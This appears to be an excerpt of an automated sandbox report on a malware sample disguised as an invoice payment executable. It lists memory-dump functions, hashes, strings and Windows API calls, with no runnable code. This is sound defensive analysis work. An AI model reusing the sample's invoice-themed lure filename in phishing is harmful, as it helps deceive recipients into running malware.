Opcode ID: 39d2c90aec3904c0342c3d761135a0a3586d6bd40faa5430d3e5b68d8eb72431
Instruction ID: ef89fef3941590a1b4d6a4410380c8df7c2e17ee42315e9e6c97b8f025cd59e5
Opcode Fuzzy Hash: 39d2c90aec3904c0342c3d761135a0a3586d6bd40faa5430d3e5b68d8eb72431
Instruction Fuzzy Hash: 0321E2B59002489FDB10CFAAD985ADEBFF8FB48320F14801AE918A3350D374A944CFA1

Function 077DB470 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 077DB4E3

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1235c3ad836a2b6eb7f5473bacb889d4dbf716a7e2d4e4064612aca24e29daed
Instruction ID: aa51337b1c73b51a6f16e1e3e4902f4c11fadb61613d886645e6b39a9e149777
Opcode Fuzzy Hash: 1235c3ad836a2b6eb7f5473bacb889d4dbf716a7e2d4e4064612aca24e29daed
Instruction Fuzzy Hash: FF21F6B59003499FCB10DF9AC985BDEFBF4FB48320F108429E958A7251D778AA44CFA1

Function 013DB418 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013DB47E

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 20e2e3dbf26ef5d18e73065e764f8e17d95203376aa7c629e663460d9390075d
Instruction ID: 5217ea5b9ae5b86f2a8358d0741e3b7a8a8c232874f3ea2768bd022f4039778c
Opcode Fuzzy Hash: 20e2e3dbf26ef5d18e73065e764f8e17d95203376aa7c629e663460d9390075d
Instruction Fuzzy Hash: 5D110FB6C003498FDB10CF9AD444BDEFBF4EB89224F11841AD419B7210C379A545CFA1

Function 012ED4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721695068.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12ed000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e44b347f3a9be5596daeb5436fabea18661631c1848b25bdb3ca1967cd45249d
Instruction ID: e252119f40a1b4950f112ed341f8d77fdd5f93b3e320dcf356fa526fb7fcf7cd
Opcode Fuzzy Hash: e44b347f3a9be5596daeb5436fabea18661631c1848b25bdb3ca1967cd45249d
Instruction Fuzzy Hash: DC216A71510209DFCB01DF58E9C8B26BFA5FB94318F60C56DD9090B246C336D416CBA1

Function 012ED3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721695068.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12ed000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037be78511324c81d92c16ae49bd45046791013ec7bb8a3da475282d00b1c561
Instruction ID: 9982267529206a11c9c1c4370b3a76041c2b28e88f113d2e996e948c954a6f25
Opcode Fuzzy Hash: 037be78511324c81d92c16ae49bd45046791013ec7bb8a3da475282d00b1c561
Instruction Fuzzy Hash: 84216AB5510209DFDB01DF48C9C8B56BFE5FBA4324F60C56CE90A0B246C336E416CBA1

Function 012FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721795151.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2647364093596493c970d02f92645ad61e0f4d6d0a7b8c52f50272c092b9c56
Instruction ID: e430d1e174639b5f5c50b99e2eba0fc9026451eae3b65767d28bb2e22f6c5069
Opcode Fuzzy Hash: d2647364093596493c970d02f92645ad61e0f4d6d0a7b8c52f50272c092b9c56
Instruction Fuzzy Hash: 13210375614208DFDB15DF58D984B16FBA5EB84314F20C97DDA0A4B342C376D407CA61

Function 012FD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721795151.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b851beb033120c9f18bcf8d9a7c0ad80d13fcedbc012ff2ecff7046216d4c506
Instruction ID: 475f810e9fd158865b44dbd38f9b3a5b27219f4df551e5e8ac890ab1cbe2b2ba
Opcode Fuzzy Hash: b851beb033120c9f18bcf8d9a7c0ad80d13fcedbc012ff2ecff7046216d4c506
Instruction Fuzzy Hash: 872106795142089FDB01DF54C5C4B16FBA5FB84324F20C57DDA094B243C376D406CAA1

Function 012FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721795151.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2219fe40dc9357624754a26e8a93ebb9bc936ee97e5cd8e52f8341ade6ec745
Instruction ID: b215dec986ac4ce639f5a9575158ac5158289247038bf38229a8faae50f9b288
Opcode Fuzzy Hash: a2219fe40dc9357624754a26e8a93ebb9bc936ee97e5cd8e52f8341ade6ec745
Instruction Fuzzy Hash: 65217C755093848FDB03CF24D994715BF71EB46314F28C5EED9498B2A7C33A980ACB62

Function 012ED4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721695068.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12ed000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 3e7787d16f79c5b9d0ec562ce949b40e917f11af5d354bb77f0f4c67798d2717
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: 74110376504284CFCB12CF54D9C8B16BFB2FB84324F24C6A9D9090B257C336D45ACBA1

Function 012ED3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721695068.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12ed000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction ID: 09a87bf59066e1da2bfcc4317f3d43d39c6dfedca0e2b4a54736866b661af9aa
Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
Instruction Fuzzy Hash: AF110376504285CFDB02CF44D5C8B56BFB2FB94324F24C2A9D9090B257C33AE45ACBA1

Function 012FD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1721795151.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12fd000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction ID: 764374994afba6cf01248e9619ce91002811bef4e43c8265f93c6e32f86f408b
Opcode Fuzzy Hash: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
Instruction Fuzzy Hash: C711BB79944284DFDB02CF54C5C4B15FBB2FB84224F24C6AEDA494B297C33AD40ACBA1

Non-executed Functions

Function 077DE130 Relevance: 1.6, Strings: 1, Instructions: 325COMMON

Download Yara Rule

Strings

{#L, xrefs: 077DE308

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: {#L
API String ID: 0-1361971085
Opcode ID: 6a590d3ea5a0317adc76e0353e075731b513e1cf719c9275177bd36fc24bf6eb
Instruction ID: 67a167fa8b036f5b669656e2c5395e55f2d0ad23d23cf0142bb102816f903ec7
Opcode Fuzzy Hash: 6a590d3ea5a0317adc76e0353e075731b513e1cf719c9275177bd36fc24bf6eb
Instruction Fuzzy Hash: A8D116B0E15219DBCB18CFAAD98059EFBF2BF89380F14D56AD419AB264D7709902CF50

Function 077DE120 Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

{#L, xrefs: 077DE308

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: {#L
API String ID: 0-1361971085
Opcode ID: 4785ffc5d4d18f2cab4cbaf248dd42d04c2ed1e43a567110ff41ba36bffb1530
Instruction ID: 8416e7984e8a39f7b3f078c0f734b608159318acb2d1e6c1658082d5f2e69c6a
Opcode Fuzzy Hash: 4785ffc5d4d18f2cab4cbaf248dd42d04c2ed1e43a567110ff41ba36bffb1530
Instruction Fuzzy Hash: E6D118B0E15219DFCB18CFAAD98049EFBF2BF89380F14D56AD419AB264D7749902CF50

Function 077D503A Relevance: 1.4, Strings: 1, Instructions: 178COMMON

Download Yara Rule

Strings

98R, xrefs: 077D51A3

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: 98R
API String ID: 0-576591972
Opcode ID: b31eb596752b6f9ece00d590a5469aee4e53f2074d22b5f018d356614fb3b3f3
Instruction ID: 37bfa73280a4176f86b7f149a61ebf624d32483deb9ce1d7aa56d112fb006179
Opcode Fuzzy Hash: b31eb596752b6f9ece00d590a5469aee4e53f2074d22b5f018d356614fb3b3f3
Instruction Fuzzy Hash: 437125B5E1520ADFCB04CFA9D4819AEFBB2FF89350F14842AD415AB314E734AA51CF94

Function 077DC250 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

iUfo, xrefs: 077DC366

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: iUfo
API String ID: 0-3820436262
Opcode ID: 82637d547daa2689f9bfd5a84a8d15ed7dc17cef4c24e091cbe0d34cae61805f
Instruction ID: a541a42dd94158b9b2c50feabc61765f2c5689d2f36401cf50d4017c1e99f356
Opcode Fuzzy Hash: 82637d547daa2689f9bfd5a84a8d15ed7dc17cef4c24e091cbe0d34cae61805f
Instruction Fuzzy Hash: 035111B5E102199FCB08CFAAD9455EEFBB2BF89310F10942AE405B7254EB345942CF64

Function 077DC241 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

iUfo, xrefs: 077DC366

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: iUfo
API String ID: 0-3820436262
Opcode ID: ae088117af87561f0112b71eb9e742eec506f7b1a46870b7cf504f59112d1ea0
Instruction ID: e9383b51ebb7c247d5da7e6507b647a34f02f945d33d551c0e0155682ea9b6b6
Opcode Fuzzy Hash: ae088117af87561f0112b71eb9e742eec506f7b1a46870b7cf504f59112d1ea0
Instruction Fuzzy Hash: 485121B5E152198FCB08CFE9D9455EEBBF2BF89310F10942AE405B7254EB345A42CB64

Function 077DC648 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

w7e^, xrefs: 077DC77D

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: w7e^
API String ID: 0-1657886525
Opcode ID: 083bdaa2ef450ed8c93212723cd5a1d17b617a0eab28c137efd9315d09399f21
Instruction ID: 860cc1e4d0648e3dc2339ec295847ef9c45c0f3863aeca186e54c5bb2e4fa2f3
Opcode Fuzzy Hash: 083bdaa2ef450ed8c93212723cd5a1d17b617a0eab28c137efd9315d09399f21
Instruction Fuzzy Hash: 7A4113B4D15219DFCB05CFAAC8405EEFBB1FB8A240F14A56AC416BB244D7384A42CF68

Function 077DC638 Relevance: 1.4, Strings: 1, Instructions: 121COMMON

Download Yara Rule

Strings

w7e^, xrefs: 077DC77D

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: w7e^
API String ID: 0-1657886525
Opcode ID: 6caa13b3ee98b6344a4f7008bb69efe69f0b797aa1c5f3bc1974c9c086adbc88
Instruction ID: 35be73abcab6bef7e7a6a58c2ac92313cf2071da86edd08110b75d6cb4eec774
Opcode Fuzzy Hash: 6caa13b3ee98b6344a4f7008bb69efe69f0b797aa1c5f3bc1974c9c086adbc88
Instruction Fuzzy Hash: E74125B0D15209DFCB05CFEAC9405EEFBB1FB8A241F1495AAC415B7254D7384A42CF68

Function 077D8D31 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

0ni, xrefs: 077D8EA3

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID: 0ni
API String ID: 0-1488673370
Opcode ID: 718dc9ad1b3babfb595b108f52312eef5e66bfb71a5c7ce10b59837d0cdf0426
Instruction ID: 1f5b2de8827da8d1a442b8eaec22461c1e6ec0695dc18c0cfeb39bc1e3a1f080
Opcode Fuzzy Hash: 718dc9ad1b3babfb595b108f52312eef5e66bfb71a5c7ce10b59837d0cdf0426
Instruction Fuzzy Hash: 9C515CB1E016588BDB58CF6B9D4579EFBF3AFC8300F14C1BA950CA6224DB3419858F51

Function 013DD74C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1722104121.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00ae64dd44b983f2cf6d5b5a27a155299bda97240e449ff350fa81b001f771c7
Instruction ID: 2b88b9c8a2e1a980f335d89fb83c91fcbd1c48849900e5584f27c0e593399f53
Opcode Fuzzy Hash: 00ae64dd44b983f2cf6d5b5a27a155299bda97240e449ff350fa81b001f771c7
Instruction Fuzzy Hash: 9AA19636E00215CFCF05DFB8E4805DEBBB6FF85308B15456AE906AB255DB31E956CB80

Function 077D7338 Relevance: .2, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c888a660876eed3e2d22e70b958c5db253957f2917bf5db1653bf2e9dd7d1eab
Instruction ID: adb3f32bf3f534aa033e7b8662e63cdeeacb800a2e9be81e94ec5b5da0a9b289
Opcode Fuzzy Hash: c888a660876eed3e2d22e70b958c5db253957f2917bf5db1653bf2e9dd7d1eab
Instruction Fuzzy Hash: E591C0B4A1525ACFCB48CFA9C58499EFBF2FF89350F249569D415AB220D330AE41CF91

Function 077D7331 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46cbb52bdbd4eab597176d2d05a5541a6945e0701121569533d4eda47ebc5b57
Instruction ID: 453be8d01474c9fcda2d189016d72b9b746dfc395dbb39bb1bc072e9da4b1fb1
Opcode Fuzzy Hash: 46cbb52bdbd4eab597176d2d05a5541a6945e0701121569533d4eda47ebc5b57
Instruction Fuzzy Hash: 8181E3B4A2525ACFCB08CF99C58499EFBF2FF89350F14956AD415AB220D330AE41CF91

Function 077DCA02 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98de4e9dc940bf7a0c3dc5da810a2e46d1d75d1432510e5b632e87e97278f31e
Instruction ID: 9e6793ce5e75ce3c3b4a421ea104e2cac8ea8f8de457d848deafc0ef5688d9f0
Opcode Fuzzy Hash: 98de4e9dc940bf7a0c3dc5da810a2e46d1d75d1432510e5b632e87e97278f31e
Instruction Fuzzy Hash: C6810CB4E141298FCB14DFA9C5905AEFBB6BF89304F24C1A9D418A7316D731AE81CF61

Function 077D8739 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 145f7167cb11fd17729906b90fd282226f74f3faa5807ec1661bdb20f15c130f
Instruction ID: bc3af9d4b2c9ab0de265ccc7cf237c810109111e519518fc7c1c568b64d115f5
Opcode Fuzzy Hash: 145f7167cb11fd17729906b90fd282226f74f3faa5807ec1661bdb20f15c130f
Instruction Fuzzy Hash: 6271E8B4E256099FCB04CFA9C9809DEFBF2FF89350F24942AD419BB254D3349E418B65

Function 077D8748 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb03034f88b9090a796d12ae372521a063f7d4db19f647fa3989ad2389b10e3f
Instruction ID: 82c2c5fabd7edb5c6a97e7f5426e475972981addf85d1baad3b70573bd83ab66
Opcode Fuzzy Hash: bb03034f88b9090a796d12ae372521a063f7d4db19f647fa3989ad2389b10e3f
Instruction Fuzzy Hash: F771D7B4E25609CFCB04CFA9C9809DEFBF2FF89350F24942AD419BB254D7349A418B65

Function 077D89C8 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55b9aa85a2342ebc0375014a7113b81347f24d04a39771bd6a80082123bf3cdf
Instruction ID: 5d1f1869f4fd43e686b9406a29366fbe8f372ad8c660597642f47567d949c004
Opcode Fuzzy Hash: 55b9aa85a2342ebc0375014a7113b81347f24d04a39771bd6a80082123bf3cdf
Instruction Fuzzy Hash: 2E4116B0E1524ADBCB04CFA9C5816AEFBF2EF89350F24D56AC405B7254E7309A41CBA5

Function 077D8530 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef05cffb0443fb698da285880fc4c1b6fc23823a4b93e7fb2c890a9c813177f
Instruction ID: f00f578ff767f3c6b54b9b8116e12b84697991c66f1606536981a5ce0f262a4b
Opcode Fuzzy Hash: 3ef05cffb0443fb698da285880fc4c1b6fc23823a4b93e7fb2c890a9c813177f
Instruction Fuzzy Hash: F14128B0E0520A9FCB48CFAAC4815AEFBF2BF89340F14C46AD415B7255D7349A41CFA1

Function 077D89D8 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d0841d1bb0725d78108d4df4425e610f8962dd39b17f3150a7fb2703a83203
Instruction ID: 88dd236416786f4ef4468c2edd9133bb78dd2ae8f4e2ca368de3271ecd65ca5b
Opcode Fuzzy Hash: 88d0841d1bb0725d78108d4df4425e610f8962dd39b17f3150a7fb2703a83203
Instruction Fuzzy Hash: 3441E7B0E1521ADBCB44CFA9C5816AEFBF2FF89340F24D56AC405B7214D7349A41CBA5

Function 077DBF10 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7ae81825cd559d0f3a179da05d83738f55755603f12f5a3895f2c4202d1e85
Instruction ID: 8824fd7901854905b5bab100377b9b48fe798b137b6fa336920027955b538b37
Opcode Fuzzy Hash: 8d7ae81825cd559d0f3a179da05d83738f55755603f12f5a3895f2c4202d1e85
Instruction Fuzzy Hash: 64411CB0E1520ADFCB44CFA6D5816AEFBF1EF89340F20956AC019B7264E3749B418F94

Function 077DBF00 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec88bda081c871a1b4c8962cb757a650098655a792441dc6311c22496dbfcc91
Instruction ID: ea20f27708aa61c04c4b9105b41ef99427594a956ed711c1c7674b7a6cedb049
Opcode Fuzzy Hash: ec88bda081c871a1b4c8962cb757a650098655a792441dc6311c22496dbfcc91
Instruction Fuzzy Hash: 4C413CB0E1920ADFCB04CFA5C5816AEFBF2AF89340F24956AC019B7264D3748B41CB95

Function 077D8540 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67799445594f529e4b14acd31aa266c278f3d1055fbe02f0626f782e1db7e30f
Instruction ID: d73e2dcf79e7cb5caa66d9b623d25bea1604ae74a9f972154897d4b4fdc821c6
Opcode Fuzzy Hash: 67799445594f529e4b14acd31aa266c278f3d1055fbe02f0626f782e1db7e30f
Instruction Fuzzy Hash: AC41E2B0E0520ADFCB48DFAAC4815AEFBF2BF89340F14C46AD515B7254D7349A418F95

Function 077D3792 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728563130.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77d0000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d908bb572fded07fd7fe192dc87e91bb720c1a140c9be313aec17dcb5eaa954c
Instruction ID: f1389429dd83f8ba35056c2732eabf268f00902a5ec0db35e4ec57a333ae01bb
Opcode Fuzzy Hash: d908bb572fded07fd7fe192dc87e91bb720c1a140c9be313aec17dcb5eaa954c
Instruction Fuzzy Hash: 2B212FB1E056589BEB19CFABDC446DEFBB7AFC9210F04C0B6D418A6214DB3109518F51

Analysis Process: Invoice-BL. Payment TT $ 28,945.99.exePID: 7276, Parent PID: 3848COMMON

Execution Graph

Execution Coverage:	14.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	87
Total number of Limit Nodes:	0

Executed Functions

Function 05B70B20 Relevance: 1.6, APIs: 1, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05B70B6C

Memory Dump Source

Source File: 00000006.00000002.4130895242.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5b70000_Invoice-BL.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c8df50bdabcb7573f5e2b76a6c1343f0a21f85150ff587a07a5f9d25dbe8202
Instruction ID: 6b905897737d840b0e49e283e956378cdc9ab5c0adf8f14926a50aad57611f00
Opcode Fuzzy Hash: 2c8df50bdabcb7573f5e2b76a6c1343f0a21f85150ff587a07a5f9d25dbe8202
Instruction Fuzzy Hash: 08214D357001198FCB58EB38C5587AE76F6EB8C745F200569D406A73A9DF75AD42CB80

Function 01315AC0 Relevance: 1.5, Strings: 1, Instructions: 281
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vfm, xrefs: 01315D77

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID: \Vfm
API String ID: 0-3356159168
Opcode ID: 5a308190cf8c4554f42ca687846f9457fc02101555e34f228d0967b2af787bb5
Instruction ID: 20112b391f0f95e69a651878fb779c588205cc3decef3bd0e97bc635c47a1914
Opcode Fuzzy Hash: 5a308190cf8c4554f42ca687846f9457fc02101555e34f228d0967b2af787bb5
Instruction Fuzzy Hash: B7B13E70E002098FDF18CFA9C9857DEBBF2BF89718F148129D855A7298EB749845CF91

Function 01316390 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4115228137.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1310000_Invoice-BL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b7e986879d28fbec5d2e145baf880783787cf332ce92447fc03040c4f770742
Instruction ID: da567234fe4ce89f73b5ca221eafe201fd7e00dcfa91af624ec8546795dad7b4
Opcode Fuzzy Hash: 3b7e986879d28fbec5d2e145baf880783787cf332ce92447fc03040c4f770742
Instruction Fuzzy Hash: 7DB141B0E00209CFDF18CFE9D98679DBBF2AF48718F148529D415E7258EBB49845CB81

Function 05B75311 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000050), ref: 05B753A3

Strings

4'qq, xrefs: 05B7535C

Memory Dump Source

Source File: 00000006.00000002.4130895242.0000000005B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5b70000_Invoice-BL.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: 4'qq
